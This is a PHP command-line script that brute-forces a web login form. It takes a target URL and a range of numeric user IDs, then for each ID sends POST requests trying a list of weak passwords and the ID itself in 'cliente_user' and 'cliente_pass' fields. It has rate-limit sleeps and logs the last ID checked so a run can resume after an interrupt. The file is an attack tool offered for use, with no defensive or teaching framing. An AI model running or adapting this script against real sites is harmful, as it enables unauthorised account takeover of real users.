#!/usr/bin/env php
<?php
session_start();

declare(ticks=1);

if (!function_exists('pcntl_signal'))
{
    printf("Error, you need to enable the pcntl extension in your php binary, see http://www.php.net/manual/en/pcntl.installation.php for more info%s", PHP_EOL);
    exit(1);
}

pcntl_signal(SIGINT, 'signalHandler');

require_once __DIR__ . '/app/curlset.php';
require_once __DIR__ . '/app/reports.php';

$target     = "https://url/";
$from       = 0;
$to         = 0;
$payload    = "";
$pass       = "123456";
$sleep      = 0;

$shortopts  = "";
$shortopts  .= "f:";
$shortopts  .= "t:";
$shortopts  .= "p:";
$shortopts  .= "s:";

$longopts  = array(
    "pass:",     // required value
    "sleep:",     // required value
    "payload:",    // required value
);

$args = getopt($shortopts,$longopts);

if( isset( $args['t'] ) ){
    $target = $args['t'];
}
if( isset( $args['f'] ) ){
    $ft     = explode("-",$args['f']);
    $from   = $ft[0];
    $to     = ( empty( $ft[1] ) ) ? $ft[0] : $ft[1];
}
if( isset( $args['p'] ) ){
    $payload = $args['p'];
}
if( isset( $args['pass'] ) ){
    $pass = $args['pass'];
}
if( isset( $args['sleep'] ) ){
    $sleep = $args['sleep'] > 0 ? $args['sleep'] : 0;
}
if( isset( $args['s'] ) ){
    $sleep = $args['s'] > 0 ? $args['s'] : 0;
}
//print $sleep;
$Reports = new Reports();
$Reports->log_file = "last-args.log";
$Reports->log( "Args: " . implode(", ", array_keys($args) ) . " | " . implode(", ",$args) );

$curl = new Curlset();
$curl->target = $target;

$_SESSION['last_number_checked'] = 0;

/**
 * Payload example
 */
for( $x = $from; $x <= $to; $x++ ){
    $curl->payload = "cliente_user={$x}&cliente_pass=12345&cliente_dire=";
    $curl->call();
    $curl->payload = "cliente_user={$x}&cliente_pass=123456&cliente_dire=";
    $curl->call();
    $curl->payload = "cliente_user={$x}&cliente_pass=123456789&cliente_dire=";
    $curl->call();
    $curl->payload = "cliente_user={$x}&cliente_pass=54321&cliente_dire=";
    $curl->call();
    $curl->payload = "cliente_user={$x}&cliente_pass=654321&cliente_dire=";
    $curl->call();
    $curl->payload = "cliente_user={$x}&cliente_pass=987654321&cliente_dire=";
    $curl->call();
    $curl->payload = "cliente_user={$x}&cliente_pass={$x}&cliente_dire=";
    $curl->call();
    $_SESSION['last_number_checked'] = $x;
    if( $sleep > 0 ){
        sleep($sleep);
    }
}

function signalHandler($signo)
{
    $Reports = new Reports();
    $Reports->log_file = "last-args.log";
    $Reports->log( "Last number checked: " . $_SESSION['last_number_checked'] );
    printf("Warning: interrupt received, killing server…%s", PHP_EOL);
    exit();
}